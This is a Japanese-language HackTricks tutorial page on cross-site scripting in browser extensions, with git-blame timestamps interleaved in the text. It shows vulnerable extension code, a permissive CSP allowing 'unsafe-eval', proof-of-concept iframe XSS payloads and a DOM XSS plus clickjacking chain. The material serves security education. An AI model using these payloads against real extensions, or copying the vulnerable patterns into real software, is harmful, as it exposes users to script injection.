2024-02-09 08:23:12 +00:00
# BrowExt - XSS Example
2023-12-31 05:23:56 +00:00
< details >
2024-02-05 20:22:21 +00:00
< summary > < strong > ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
HackTricks をサポートする他の方法:
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
* [**公式PEASS& HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )、当社の独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) コレクションを発見する
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f ) または [**telegramグループ** ](https://t.me/peass ) に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live ) をフォローする**
* **ハッキングテクニックを共有するために、PRを** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github リポジトリに提出する
2023-12-31 05:23:56 +00:00
< / details >
2024-02-09 08:23:12 +00:00
## Cross-Site Scripting (XSS) through Iframe
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
このセットアップでは、**コンテンツスクリプト**が実装され、クエリパラメータを含むURLをIf rameのソースとして取り込んだIframeがインスタンス化されます:
2023-12-31 05:23:56 +00:00
```javascript
2024-02-05 20:22:21 +00:00
chrome.storage.local.get("message", result => {
let constructedURL = chrome.runtime.getURL("message.html") +
"?content=" + encodeURIComponent(result.message) +
"&redirect=https://example.net/details";
frame.src = constructedURL;
2023-12-31 05:23:56 +00:00
});
```
2024-02-09 08:23:12 +00:00
以下は、ファイル**`message.html`**にアクセス可能なHTMLページで、URLのパラメータに基づいて動的にコンテンツをドキュメントボディに追加するように設計されています:
2024-02-05 20:22:21 +00:00
```javascript
$(document).ready(() => {
let urlParams = new URLSearchParams(window.location.search);
let userContent = urlParams.get("content");
$(document.body).html(`${userContent} < button id = 'detailBtn' > Details< / button > `);
$('#detailBtn').on('click', () => {
let destinationURL = urlParams.get("redirect");
chrome.tabs.create({ url: destinationURL });
2023-12-31 05:23:56 +00:00
});
});
```
2024-02-09 08:23:12 +00:00
悪意のあるスクリプトが敵対者のページで実行され、Iframeのソースの`content`パラメータが変更され、**XSSペイロード**が導入されます。これは、有害なスクリプトを含むようにIframeのソースを更新することで達成されます:
2023-12-31 05:23:56 +00:00
```javascript
2024-02-05 20:22:21 +00:00
setTimeout(() => {
let targetFrame = document.querySelector("iframe").src;
let baseURL = targetFrame.split('?')[0];
let xssPayload = "< img src = 'invalid' onerror = 'alert( \"XSS \")' > ";
let maliciousURL = `${baseURL}?content=${encodeURIComponent(xssPayload)}` ;
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
document.querySelector("iframe").src = maliciousURL;
2023-12-31 05:23:56 +00:00
}, 1000);
```
2024-02-05 20:22:21 +00:00
過度に許可されたContent Security Policyは次のようなものです:
2023-12-31 05:23:56 +00:00
```json
"content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self';"
```
2024-02-09 08:23:12 +00:00
以下は、JavaScriptの実行を許可し、システムをXSS攻撃に対して脆弱にすることができます。
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
XSSを引き起こす別のアプローチは、Iframe要素を作成し、そのソースを`content`パラメータとして有害なスクリプトを含めることです:
2023-12-31 05:23:56 +00:00
```javascript
2024-02-05 20:22:21 +00:00
let newFrame = document.createElement("iframe");
newFrame.src = "chrome-extension://abcdefghijklmnopabcdefghijklmnop/message.html?content=" +
encodeURIComponent("< img src = 'x' onerror = 'alert( \"XSS \")' > ");
document.body.append(newFrame);
2023-12-31 05:23:56 +00:00
```
2024-02-05 20:22:21 +00:00
## DOM-based XSS + ClickJacking
この例は、[元の投稿の解説](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/)から取得されました。
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
問題の核となるのは、**`/html/bookmarks.html`**にあるDOMベースのクロスサイトスクリプティング( XSS) 脆弱性です。問題のJavaScriptは、**`bookmarks.js`**の一部で以下に詳細が記載されています。
2023-12-31 05:23:56 +00:00
```javascript
2024-02-05 20:22:21 +00:00
$('#btAdd').on('click', function() {
var bookmarkName = $('#txtName').val();
if ($('.custom-button .label').filter(function() {
return $(this).text() === bookmarkName;
2023-12-31 05:23:56 +00:00
}).length) return false;
2024-02-05 20:22:21 +00:00
var bookmarkItem = $('< div class = "custom-button" > ');
bookmarkItem.html('< span class = "label" > ' + bookmarkName + '< / span > ');
bookmarkItem.append('< button class = "remove-btn" title = "delete" > x< / button > ');
bookmarkItem.attr('data-title', bookmarkName);
bookmarkItem.data('timestamp', (new Date().getTime()));
$('section.bookmark-container .existing-items').append(bookmarkItem);
persistData();
2023-12-31 05:23:56 +00:00
});
```
2024-02-09 08:23:12 +00:00
このコードスニペットは、**`txtName`** 入力フィールドから ** `value` ** を取得し、HTML を生成するために文字列連結を使用し、それをjQueryの `.append()` 関数を使ってDOMに追加します。
2023-12-31 05:23:56 +00:00
2024-02-09 08:23:12 +00:00
通常、Chrome 拡張機能のコンテンツセキュリティポリシー( CSP) はこのような脆弱性を防ぎます。ただし、**'unsafe-eval' でのCSP緩和**とjQueryのDOM操作メソッドの使用( これはDOM挿入時にスクリプトを [`eval()` ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval ) に渡すために [`globalEval()` ](https://api.jquery.com/jquery.globaleval/ ) を使用)により、依然として攻撃が可能です。
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
この脆弱性は重要ですが、その悪用は通常、ユーザーの操作に依存します: ページを訪れ、XSS ペイロードを入力し、「追加」ボタンをアクティブ化する必要があります。
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
この脆弱性を強化するために、二次的な **clickjacking** 脆弱性が悪用されます。Chrome 拡張機能のマニフェストには、広範な `web_accessible_resources` ポリシーが示されています:
2023-12-31 05:23:56 +00:00
```json
"web_accessible_resources": [
2024-02-05 20:22:21 +00:00
"html/bookmarks.html",
2023-12-31 05:23:56 +00:00
"dist/*",
"assets/*",
"font/*",
2024-02-05 20:22:21 +00:00
[...]
2023-12-31 05:23:56 +00:00
],
```
2024-02-05 20:22:21 +00:00
Notably, the ** `/html/bookmarks.html` ** page is prone to framing, thus vulnerable to **clickjacking** . This vulnerability is leveraged to frame the page within an attacker’ s site, overlaying it with DOM elements to redesign the interface deceptively. This manipulation leads victims to interact with the underlying extension unintentionally.
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
## References
2023-12-31 05:23:56 +00:00
* [https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/ ](https://palant.info/2022/08/31/when-extension-pages-are-web-accessible/ )
* [https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/ ](https://thehackerblog.com/steam-fire-and-paste-a-story-of-uxss-via-dom-xss-clickjacking-in-steam-inventory-helper/ )
< details >
2024-02-05 20:22:21 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
Other ways to support HackTricks:
2023-12-31 05:23:56 +00:00
2024-02-05 20:22:21 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-09 08:23:12 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**.**
2024-02-05 20:22:21 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2023-12-31 05:23:56 +00:00
< / details >